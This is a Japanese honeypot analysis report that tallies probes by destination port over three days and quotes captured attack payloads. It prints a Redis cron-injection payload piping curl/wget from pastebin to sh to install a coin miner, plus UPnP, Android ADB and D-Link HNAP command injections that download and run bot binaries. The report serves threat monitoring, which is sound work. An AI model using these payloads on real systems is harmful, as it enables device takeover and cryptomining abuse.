【ハニーポット】Honeytrap簡易分析(78-80日目:10/25-10/27)
Honeytrapの簡易分析となります。
◾️10/25-10/27 Honeytrap分析(80ポートを除く)
<宛先ポート通信>
宛先ポート | 検知数 |
445 | 7631 |
9922 | 260 |
3389 | 223 |
1433 | 221 |
22 | 187 |
81 | 179 |
8080 | 140 |
5555 | 103 |
52869 | 90 |
6379 | 84 |
<宛先ポート 9922の通信>
9922ポート宛の通信が増加していますが、中身はSSHへのアクセスを狙った調査行為の通信
ペイロード:
SSH-2.0-libssh2_1.4.3..
<宛先ポート 6379の通信>
検知数は多いものの、気になったので調査しました。Redisサーバを狙った脆弱性と思われます。最終的にはCoinMinerのダウンロードを試みていますが、ダウンロード用のスクリプトで様々なサービスをkillしたりしていました。
ペイロード:
set backuper1 "\n\n\n*/1 * * * * root (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..set backuper2 "\n\n\n*/1 * * * * (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..config set dir /etc/cron.d/..config set dbfilename root..save..config set dir /var/spool/cron/..config set dbfilename root..save..config set dir /var/spool/cron/crontabs/..config set dbfilename root..save..
→hxxps://pastebin[.]com/raw/uuYVPLXd で取得した文字列をBase64でデコード
→CoinMinerのダウンロード
マルウェアの傾向は大きく変化していませんでした。
宛先ポート | ダウンロード先 | ペイロード | 脆弱性 | 検知数 |
52869 | hxxp://185[.]159[.]82[.]181/h[.]hua hxxp://76[.]74[.]177[.]230/seraph[.]mips hxxp://109[.]201[.]143[.]178/loli[.]mips |
POST /picsdesc.xml HTTP/1.1 ~省略~ <NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/h.hua -O h`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription> ~省略~ |
63 | |
5555 | hxxp://185[.]162[.]130[.]187/adbs2 hxxp://80[.]211[.]117[.]113/bc hxxp://188[.]209[.]52[.]142/c |
CNXN............2.......host::.OPEN9............C......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;echo lol. | 72 | |
8081 | hxxp://206[.]189[.]196[.]216/dlink | POST /HNAP1/ HTTP/1.0 SOAPAction: hxxp://purenetworks.com/HNAP1/`wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/.repn && chmod 777 /tmp/.repn && sh /tmp/.repn` ~省略~ |
D-Link | 1 |
以上となります。